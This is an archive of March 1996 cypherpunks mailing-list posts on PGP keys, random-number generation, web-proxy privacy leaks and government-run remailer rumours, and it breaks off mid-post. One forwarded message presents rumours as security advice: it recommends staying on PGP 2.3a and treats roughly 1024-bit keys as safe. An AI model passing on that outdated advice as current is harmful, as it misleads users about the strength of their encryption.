00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Mar 1996 08:00:24 +0800
To: cypherpunks@toad.com
Subject: Re: M A F_i o s
Message-ID: <199603022335.PAA18923@ix15.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 PM 3/1/96 -0500, John Young <jya@pipeline.com> wrote:
>   3-1-96. TWP:
>   "Expert Panel Wants Intelligence Director to Hold More Power."
>      The commission finds that the patchwork of 14 separate
>      intelligence agencies is functioning well in its current
>      form. To meet tbe growing threat of worldwide criminal
>      activity the panel suggested creation of a high-level
>      policy group run out of the White House, called tbe
>      Global Crime Committee.

But they've already _got_ the Pentagon!  

The title does remind me somewhat of
        "Buckaroo Banzai against the World Crime League"....




#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
Date: Sun, 3 Mar 1996 08:07:04 +0800
To: Mutant Rob <wlkngowl@unix.asb.com>
Subject: Re: Is there any work on entropy-lowering schemes?
Message-ID: <Pine.3.89.9603021534.A24537-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Mar 1996, Mutant Rob wrote:

>So it seems possible to create a scheme that given a key will take a
>block of n bits and expand it to 1.5n or 2n bits, recoding it in such
>a way that determining the key is difficult even if one suspects such
>a scheme has been used... but that using the scheme will make the data
>look more like the MSBs of graphical data rather than encrypted data.

Stealth 1.3 (or is it 1.2?) does that, but it only makes the data look
more like the MSBs, and not *exactly* like the MSBs. I think it's available
from Adam Back's WWW site (http://dcs.ex.ac.uk/~aba/stealth/). 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
Date: Sun, 3 Mar 1996 23:11:47 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Web Browsing
Message-ID: <Pine.3.89.9603021521.A24537-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Mar 1996, Timothy C. May wrote:

> These are "web proxies," and searching on this should produce some
> information to answer your questions.

There's a problem with that. I've noticed several pages recently with 
hidden mailto: links that aren't marked as such. So you can be happily 
browsing away through a web proxy only to click on a link and have your 
real id mailed to the site's owners. As people have mentioned, this is 
even worse with Javascript.

Note to Netscape people: Is it possible to have an option that will *always*
pop up a mail window and request confirmation before mail is sent out? Or
disable mailto altogether? It would be a lot easier than binary editing 
the executable to remove all the mailto strings...

Or does it exist? I can't find it.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 3 Mar 1996 06:07:38 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Truly Random Numbers
In-Reply-To: <ad5df17e0002100488bd@[205.199.118.202]>
Message-ID: <199603022126.QAA17169@homeport.org>
MIME-Version: 1.0
Content-Type: text


	My expectation would be that your numbers are not random in a
cryptographic sense, and that this route of attack is much less
efficient than others that would be used.

	I'll note that PGP does NOT take your data entered and convert
it to numbers, but takes timings to choose a hard to predict starting
point for its prime searching.

	I'd expect this use of timings is better than using the large
random number you entered, but in a theory sense only.  Both are
pretty difficult; thats why we like large numbers. :)

Adam


Timothy C. May wrote:

| (In fact, I'd venture that merely asking people to type in digits would
| produce starting points that essentially would be very random...maybe some
| clustering here and there, or an unequal number of digits, or too equal a
| distribution, but adequate. An since an attacker could not know what the
| sources of randomness were for some particular person, I doubt strongly
| that factoring the modulus would be any easier.)
| 
| Suppose a =
| 4801747274372727828487361830183561393615106551195496693610351528409257572926
| 659
| 2027575902673957001560102249600798767153757681546836352857811107361291541511
| 
| (which is about 140-150 digits, "randomly" entered by me)
| 
| and p is computed as the first prime larger than this.
| 
| q found the same way
| 
| Now, is the modulus, n = pq, any more factorable than if a "more random"
| source of p and q were used?
| 
| (I am actually asking this as a real question. Does anyone know if
| factoring is significantly easier for such not-completely-random numbers? I
| would expect that in theory it is, but in practice this is not a useful
| point of entry into factoring n. Just a hunch.)
| 
| --Tim
| 
| 
| Boycott "Big Brother Inside" software!
| We got computers, we're tapping phone lines, we know that that ain't allowed.
| ---------:---------:---------:---------:---------:---------:---------:----
| Timothy C. May              | Crypto Anarchy: encryption, digital money,
| tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
| W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
| Higher Power: 2^756839 - 1  | black markets, collapse of governments.
| "National borders aren't even speed bumps on the information superhighway."
| 
| 
| 
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Mar 1996 08:59:58 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Web Browsing
Message-ID: <199603030038.QAA06256@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:44 PM 3/2/96 +0000, "Mark Grant, M.A. (Oxon)" <mark@unicorn.com> wrote:
>> These are "web proxies," and searching on this should produce some
>> information to answer your questions.
>.... hidden mailto: .... even worse with Javascript.
>
>Note to Netscape people: Is it possible to have an option that will *always*
>pop up a mail window and request confirmation before mail is sent out? Or
>disable mailto altogether? It would be a lot easier than binary editing 
>the executable to remove all the mailto strings...

At least in the Windows version, you can set the SMTP server you
want to use for your outgoing mail.  So you could do a proxy email server
that listens for SMTP and pops up confirmations for outgoing traffic.
For the moment, you'd probably have to write your own, but the new
Winsock Remailer probably has the code you need to do most of the work,
and you'd only have to add some GUI buttons and whistles.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 4 Mar 1996 06:14:01 +0800
To: Laurence Lundblade <lgl@qualcomm.com>
Subject: Re: A brief comparison of email encryption protocols
Message-ID: <199603030038.QAA06274@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:01 AM 2/29/96 -0800,  Laurence Lundblade <lgl@qualcomm.com> wrote:
.....CME wrote....
>>Like X.509, my certs have an Issuing-name and a Subject-name -- but
>>they're both cryptographic hashes of public keys.  You can take a portion
>>of those hashes [e.g., low order 12 bits] and use it to index a hash table
>>of certificates or keys.  The cert is more general than X.509 -- that is,
......
>Isn't using a hash as the identifier replicating the key distribution
>problem that PGP has or are you including some other data that can be used
>to look up the cert?  I think a problem occurs when you have 20 billion of
>these certs (two for every person in the year 2010 or such).  A simple hash
>into a table isn't going to cut it because you a single database (with
>replication?) isn't going to be possible.  Some hierarchical lookup like
>DNS is going to be needed. The look ups are needed to check for revocation.

There's a name collision on the word "hash" here.  Carl was using both
hashes in the same sentence.  A "cryptographic hash" is a strongly one-way
mapping from an input string (in this case a public key) to a number.
A hash table is a data structure that uses a mapping from an input string
to a number to decide where to put things.  An MD5 cryptographic hash
function used on PGP public keys (e.g. to get the fingerprint) is
64 bits long, so there may be a few collisions if there are 2**34 keys
out there; if things scale to that point, PGP 4.1.3 need to use SHA for
fingerprints instead (or in addition).  Carl is proposing using a 
hash table (indexed by a hash-table hash of the cryptographic hash)
to store public keys; that's a separate problem, though of course if you
want to store 20 billion keys in one place, there are better data structures
than simple hash tables.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Mar 1996 09:20:55 +0800
To: "marcus (m.d.) leech" <mleech@bnr.ca>
Subject: Re: Web of Trust vs other models
Message-ID: <199603030054.QAA28602@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 AM 3/1/96 -0500, you wrote:
>There are a pool of 1 million keys.  Each of those keys is signed by between
>  two and 5 other randomly chosen keys in the pool.  
>  Each signature implies a trust relation between the key and the signer.
>Given that, determine mean, min, and max path lengths for purposes of
>  "certification".
>Has anyone done this experiment?

Probably been done, though not necessarily in a PGP context. 
The problem is equivalent to analyzing a randomly selected directed graph,
and some Operations Research or CS grad student has probably done it.

Meanwhile, Don Kitchen at one point collected all the data off the
MIT keyserver for analysis, which is a much different problem than
random signatures.  I found that the chain from some middle point,
such as Phil Zimmermann's or Derek Atkins's key was about 12-14 levels
deep, averaging about 6, which compares interestingly with the
default PGP depth limit of4.  From my key, it was pretty deep,
especially since my certification from Phil Karn was from one of
his older keys, which is why I asked Derek to sign my key...

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Mar 1996 09:27:16 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT%TCCSLR@emamv1.orl.mmc.com>
Subject: Re: PGP 3.0/4.0
Message-ID: <199603030054.QAA28612@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 AM 3/1/96 -0500, you wrote:
>At the same time am trying to set up a secure mailing system for
>80,000 mailboxes (soon to be over 200,000) and the last time I put
>together a 6,000 key ring on a 386 it took three days & several Mb.

Fortunately, on a site this big, you can afford to use a Pentium or
Sparcstation and 32-bit code :-)  However, if it took you that long
(as opposed to, say 4 hours), you probably were short of RAM and
were paging a lot.

>This will require a "different" mechanism.

Yup.  You may be able to do it within the structure of the current PGP,
by dyamically managing keys in separate files (e.g. 80,000 files,
or condensations into keyrings of say 100 keys) though it would help
immensely to hack the key retrieval code.  Under PGP 3.0, you'll have
libraries to let you do this stuff; until then it's probably not
too hard to build a front-end (stealing the non-RSA portions of PGP)
that looks at the keys in a file and calls PGP with a request to use
the correct keyring file, or some such hackery.

Or, of course, you can license RSAREF and integrate the code yourself.
Depending on the email volume, it may be cheaper to just license RSA,
so you can use better bignum packages like some of the European PGP flavors.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 3 Mar 1996 08:43:38 +0800
To: cypherpunks@toad.com
Subject: Random keys ?
Message-ID: <960302193021.20202137@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


  
  >	This does not demonstrate that the RSA keys are as well
  >distributed, but it does generate some confidence that the key
  >generation methods of PGP are not very broken.  Testing for RSA
  >generation would be more difficult, since there are some practical
  >difficulties in getting a large sample of RSA private keys.
  
  True but do not need private keys, just public ones (one to one relation),
  should be able to get a large sample (20,000 in one place did I hear ?)
  of those.
  						Warmly,
  							Padgett





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 3 Mar 1996 09:14:59 +0800
To: cypherpunks@toad.com
Subject: Anonymous Web Browsers
Message-ID: <960302194141.20202137@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>I took the JavaScript stuff that was posted and put it in one of my web
>pages (http://students.cs.byu.edu/~don/mail2news.html). I had to pick a new
>address because support@netscape.com is reportedly now just an autoresponder.
>I've disabled java, I've changed the mail server to null (from the default
>localhost) and none of it stops the JavaScript from sending mail.

You did this to the *server* or the *client* ? (the latter is what I was
talking about). If the client, then is Netscape/Java acting as its own
mail server ? Guess I am going to have to did out a sniffer and see just
what is going on...
					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 3 Mar 1996 10:09:21 +0800
To: cypherpunks@toad.com
Subject: Re: M A F_i o s
Message-ID: <v02120d01ad5eaad9baca@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:35 PM 3/2/96, Bill Stewart wrote:
 *         "Buckaroo Banzai against the World Crime League"....

Onk?

...another BB movie? Did they make another one????



Cheers,
Bob

(I may have been one of the four people who saw the movie in an actual
theatre...)

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sun, 3 Mar 1996 11:06:21 +0800
To: cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <199603030243.VAA16849@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Timothy C. May wrote:
[..]
> Now, is the modulus, n = pq, any more factorable than if a "more
> random" source of p and q were used?
> 
> (I am actually asking this as a real question. Does anyone know if
> factoring is significantly easier for such not-completely-random
> numbers? I would expect that in theory it is, but in practice this is
> not a useful point of entry into factoring n. Just a hunch.)
> 

Only if I can have a good enough idea of the non-random method for
generating numbers, or if I can find some useful statistical correlations
in your numbers.  (And then again, what do you mean by "significantly
easier"?  Knowing 1 bit reduces the work by half, but with orders or
thousands of bits, it's not much help.)

Whether I can realisitically reproduce or work with that non-random
method of key generation is another matter, though.

Rob.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTkHYCoZzwIn1bdtAQHdSgGAzgoS4Y1BQuI5hzlsLsfnoKyzVALJD3TR
Mm5Dmu/I5N3Rnk9TxNviwLFjKp6Fd35Z
=UnWo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sun, 3 Mar 1996 14:28:06 +0800
To: cypherpunks@toad.com
Subject: Re: M A F_i o s
Message-ID: <199603030247.VAA16881@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart wrote:
[..]
> The title does remind me somewhat of
>         "Buckaroo Banzai against the World Crime League"....

Hm. Remember the scene where one of his buddies in the film could
just decode some military crypto just by staring at it...

*sigh*

Back to the regularly scheduled noise.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTkIRCoZzwIn1bdtAQFvxAGAyVKXhD4fV6CE0ivluAJTLrAmbimmrzo3
v0MDgt0SYpt29XcV77uiaRMIXSkqtx+o
=wlQb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 4 Mar 1996 20:16:38 +0800
To: cypherpunks@toad.com
Subject: Teach the children well...
Message-ID: <Pine.SOL.3.91.960302213845.9298C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


I got the latest copy of the latest ComputerWare catalog (they're a big 
mac dealer). Up front, in there list of new releases was something that 
looked fun;

---
Top Secret Decoder (CD-ROM)
Ages 8-12

Mysterious, marvelous, mind-stretching software for kids who love 
creating and cracking secret codes. Kids'll sharpen their 
critical-thinking skills and earn top-otc secret agent credentials. 
Includes 300 code-cracking challenges, spectacular printing, plus 10 
difficulty levels. 
$39.99
	Houghton Mifflin Interactive
-----

There is no truth to the rumours that they are POTP or IPG licencees. If you
beat level 10, an animated Jim Bizdos comes out and does a little dance

Take a copy along when you do your visit for  NetDay 

Simon

 ---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 3 Mar 1996 11:16:17 +0800
To: cypherpunks@toad.com
Subject: RNG method
Message-ID: <9603030304.AB20019@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I thought of that for a long time.

 - Use a microphone on your sound card and locate it close to the computer
fan.
 - generate a (relatively short) set of random number, maybe using the PRNG of
the
      computer.
 - Use the LSB of the sampled sound, the sampling being done at intervals fixed
by
     the serie of numbers generated by the PRNG.
 - when the numbers generated by the prng are exausted, re-use part of the
output stream
     as a random source of numbers for the sampling interval.

 - keep doing this up until:
     1) you are fed up of looking at RND numbers on your screen
     2) you have no use for rnd numbers anymore
     3) your hard disk is full
     4) your computer cpu is so mixed up that it starts outputting all your PGP
encrypted
        files in Serbo-Croatian cleartext
     5) any other reasons deemed reasonable by the computer operator
     6) none of the above

Whaddyathink of it?

Regards to almost all Cyphering Punksters

JFA

Please note, my new key signature is:

2048 bits key Id: C58ADD0D 
1996/03/01 Jean-Francois Avon <jf_avon@citenet.net>
fingerprint =  52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 

But I'll still use my old key for signing for a while.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMTi0fwOWptJXIUrtAQE2DgP/S8VRX3PbrKHMKl6JJrFvZgZhdhzOk8Am
8qLJzvwjGZ7ll1gZTYT5iLfAEw+03wpy0eS/ohYdlgQ0Xu9AI418uLP6dReQbsjg
ndz9/LIaQeOmrZgL1BlAtk9119QmtCdzx59gwwngz1qNYUZNhJ4l10UGz2EWksXI
51Lve+FjKE0=
=zdM0
-----END PGP SIGNATURE-----
**** OLD KEY: USE ONLY FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 
Jean-Francois Avon <jf_avon@citenet.net>
84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Sun, 3 Mar 1996 14:15:17 +0800
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson P.E. Information Security)
Subject: Re: Truelly Random Numbers
In-Reply-To: <960302142608.202017b7@hobbes.orl.mmc.com>
Message-ID: <199603030607.WAA02700@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is a good idea for random numbers:

Take a piece of non conducting board, say about six by six
feet. Put electrodes on it; say a pair of electrodes every
quarter inch or so across and down. 

Each pair of electrodes would be connected to logic so that
it generates a unique number. When the electrodes are shorted,
the number would be generated.

Put this contraption out in the rain. 

As raindrops fall on the board with electrodes, the water would
conduct and short the electrodes. 

Rain falls in a totally random manner. As raindrops hit the 
electrodes, they would momentarily short and cause a number
to be generated. 

Yout would get a random series of numbers. 

Now, as it does not rain in the same place all the time, a
network of these rain random generators could be set up troughout
the land and be hooked up on the Internet. Each one would be
sort of a rain random number server. These servers would cooperate.
They would notify each other when one has rain raining on it and 
another one would not.

We could have a series of master servers, or dispatcher. The dispatchers
would work cooperatively and collectively know which rain random 
generator has rain raining on it and is generating random numbers.
It would be up to the client, who is needing random numbers to access
the rain random generators that are operating. 

All of this could be done in real time using current client server
technology. 

In fact, since it is allways raining in more than one part of the 
world at any given time, many rain random generator servers would
be available at any time. The master servers, or dispatchers, would
have a constant running list of active generators.

What do you all think?

Mark Allyn
allyn@allyn.com
http://mark.allyn.com
http://clearplastic.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sun, 3 Mar 1996 12:38:13 +0800
To: cypherpunks@toad.com
Subject: Re: RNG method
Message-ID: <199603030424.XAA17463@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jean-Francois Avon (JFA Technologies, QC, Canada) wrote:
> 
> I thought of that for a long time.
> 
>  - Use a microphone on your sound card and locate it close to the
> computer fan.

It's been thought of before, along with scraping the microphone against
the desk.  I've been told this works best when first turning the gain up
on the soundcard and setting it for stereo input.

The raw data and be processed cryptographically (with a cipher or run
through a hash).

This method will be an option for the NOISE.SYS driver eventually.


- --Rob

PS - noise049.zip has been uploaded to a few sites today.  When I get
confirmation I'll announce it...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTke4SoZzwIn1bdtAQHQ3wF9GsZjk+jbtWrap8sKcSXDQ3n8GVksofBX
CaVPqXKiE7CxB41hbo2ftSFqQ+P3XhFX
=gdTO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 3 Mar 1996 13:19:41 +0800
To: cypherpunks@toad.com
Subject: Re: RNG method (fwd)
Message-ID: <199603030529.XAA03142@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 2 Mar 1996 23:24:04 -0500
> Subject: Re: RNG method
> > 
> >  - Use a microphone on your sound card and locate it close to the
> > computer fan.
> 
> It's been thought of before, along with scraping the microphone against
> the desk.  I've been told this works best when first turning the gain up
> on the soundcard and setting it for stereo input.
> 

If you use the fan remember in your power supply remember that many of them
run directly off the 120 VAC. As a consequence the sound it makes will have
a strong 60Hz componant.

If you are using a DC bearing fan then there will be a componant in the
noise related to the number of balls in the bearing.

DC bearingless fans should provide the best white noise provided the
bushings are not worn. Once they wear you will be a harmonic related to
shaft diameter, shaft length, and the gap between main shaft and bushing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 3 Mar 1996 13:20:55 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Jefferson Wheels?
Message-ID: <199603030508.AAA18092@homeport.org>
MIME-Version: 1.0
Content-Type: text


Does anyone know where I might buy a Jefferson Wheel cipher?  The army
version (M-118?) would be fine.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Mon, 4 Mar 1996 07:11:54 +0800
To: chat@aen.org
Subject: (Fwd) Gov't run anon servers
Message-ID: <m0ttM4O-004Xo1C@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


This states that some  anonymous remailers are run by various gov't 
and that encryption keys up to 1000 bits are crackable.

Whether this is true or disinformation, you are using a 1024 bit key
and all your messages through anonymous remailers are encrypted
aren't they?

Also note that while later versions of PGP are capable of larger 
keys, that these versions of PGP are not known to be secure. PGP 2.3a 
is the last version released prior to gov't interference.

PGP 2.3a will do 1264 bit keys if you enter 1264 in the box instead 
of the number it askes for when if asks for the type of key security 
you want.

------- Forwarded Message Follows -------

alt.privacy.anon-server,alt.anonymous.messages,alt.anonymous,
talk.politics.crypto,alt.politics.org.covert,alt.politics.org.nsa,alt.politics.datahighway,
alt.culture.internet,alt.culture.usenet,alt.cyberspace,alt.conspiracy

From: an366601@anon.penet.fi (** CRAM **)
Date: Sun,  3 Mar 1996 13:15:55 UTC
Subject: Strassman & Marlow comment on NSA/remailers

Forwarded message:
>From ausman@wired.com  Tue Feb  6 01:42:13 1996
Message-Id: <199602060109.RAA09056@wired.com>
To: sameer@CSUA.Berkeley.EDU
Subject: has this been on cypherpunks?
Date: Mon, 05 Feb 1996 17:09:17 -0800
From: Jim Ausman <ausman@wired.com>

Received: (from daemon@localhost) by wired.com (8.7.3/8.7.3) id QAA27559 for
pork-list; Mon, 5 Feb 1996 16:13:51 -0800 (PST)
Received: from [204.62.132.47] (mckinley.wired.com [204.62.132.47]) by
wired.com (8.7.3/8.7.3) with SMTP id QAA27543 for <pork>; Mon, 5 Feb 1996
16:13:43 -0800 (PST)
Message-Id: <v0213050bad3c4c88b88d@[204.62.132.47]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 5 Feb 1996 16:14:37 -0800
To: pork@wired.com
From: kate@hotwired.com (Kate McKinley)
Subject: CIA and you
Sender: owner-pork@hotwired.com
Precedence: bulk
Status: O

>Sorry to send this through the "help email address" but I couldn't find
>your news email address.

>I attended last weeks "Information, National Policies, and International
>Infrastructure" Symposium at Harvard Law School, organized by the Global
>Information Infrastructure Commission, the Kennedy School and the
>Institute for Information Technology Law & Policy of Harvard Law School.

>During the presentation by Paul Strassmann, National Defense University
>and William Marlow, Science Applications International Corporation,
>entitled "Anonymous Remailers as Risk-Free International Infoterrorists"
>the questions was raised from audience (Professor Chaarles Nesson,
>Harvard LAw School) - in a rather extended debate - whether the CIA and
>similar government agencies are involved in running anonymous remailers
>as this would be a perfect target to scan possibly illegal messages.

>Both presenters explicitly acknowledged that a number of anonymous
>remnailers in the US are run by government agencies scanning traffic.
>Marlow said that the government runs at least a dozen remailers and that
>the most popular remailers in France and Germany are run by the
>respective government agencies in these countries. In addition they
>mentioned that the NSA has successfully developed systems to break
>encrypted messages below 1000 bit of key length and strongly suggested
>to use at least 1024 bit keys. They said that they semselves use 1024
>bit keys.

>I ask Marlos afterwards if these comments were off or on record, he
>paused then said that he can be quoted.

>So I thought I pass that on. It seems interesting enough, don't you
>think?

>Best

>Viktor Mayer-Schoenberger
>Information Law Project
>Austrian Institute for Legal Policy

Kate McKinley
kate@hotwired.com

CAVE CANUM

 \   \   \   \   \   \   \   \   \   |   /   /   /   /   /   /   /   /   /   /
          _______       ________          _____        _____  _____
         ///   \\\      |||   \\\        /// \\\       |||\\\///|||
        |||     ~~      |||   ///       |||   |||      ||| \\// |||
        |||     __      |||~~~\\\       |||~~~|||      |||  ~~  |||
         \\\   ///      |||    \\\      |||   |||      |||      |||
          ~~~~~~~       ~~~     ~~~     ~~~   ~~~      ~~~      ~~~
 /   /   /   /   /   /   /   /   /   |   \   \   \   \   \   \   \   \   \   \

C y b e r s p a t i a l  R e a l i t y  A d v a n c e m e n t  M o v e m e n t


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi



Yet she became more and more promiscuous as she recalled the days of her
youth, when she was a prostitute in Egypt. There she lusted after her
lovers, whose genitals were like those of donkeys and whose emissions
were like that of horses. So you longed for the lewdness of your youth,
when in Egypt your bosom was caressed and your young breasts fondled.

Ezekiel 23:19-21
Fight the Communications Decency Act or suffer not being able to 
transmit the Bible online.
http://www.cdt.org/

I like cats, probably more than I should. They are cute, 
cuddly and kill things and then lay them at my feet 
in tribute.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@vegas.gateway.com (Anonymous Remail Service)
Date: Tue, 5 Mar 1996 01:40:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603031418.JAA09675@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


Thought that this was worth reposting:

>I attended last weeks "Information, National Policies, and International
>Infrastructure" Symposium at Harvard Law School, organized by the Global
>Information Infrastructure Commission, the Kennedy School and the
>Institute for Information Technology Law & Policy of Harvard Law School.
>
>During the presentation by Paul Strassmann, National Defense University
>and William Marlow, Science Applications International Corporation,
>entitled "Anonymous Remailers as Risk-Free International Infoterrorists"
>the questions was raised from audience (Professor Chaarles Nesson,
>Harvard LAw School) - in a rather extended debate - whether the CIA and
>similar government agencies are involved in running anonymous remailers
>as this would be a perfect target to scan possibly illegal messages.
>
>Both presenters explicitly acknowledged that a number of anonymous
>remnailers in the US are run by government agencies scanning traffic.
>Marlow said that the government runs at least a dozen remailers and that
>the most popular remailers in France and Germany are run by the
>respective government agencies in these countries. In addition they
>mentioned that the NSA has successfully developed systems to break
>encrypted messages below 1000 bit of key length and strongly suggested
>to use at least 1024 bit keys. They said that they semselves use 1024
>bit keys.
>
>I ask Marlos afterwards if these comments were off or on record, he
>paused then said that he can be quoted.
>
>So I thought I pass that on. It seems interesting enough, don't you
>think?
>
>Best
>
>Viktor Mayer-Schoenberger
>Information Law Project
>Austrian Institute for Legal Policy
>

Groundfog@alpha.c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Mar 1996 23:18:39 +0800
To: cypherpunks@toad.com
Subject: Re: Netcom and Credit Cards
Message-ID: <199603031503.KAA20008@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> The "credit card numbers were stolen" point, that I believe Ed Carp was
> referring to, had to do with the Mitnick affair, and is very old news.

The fact that they had been stolen was mentioned in an edition of 2600
6 months before the Mitnick saga.  Netcom had been told about the
security breaches many times, but refused to acknowledge that their
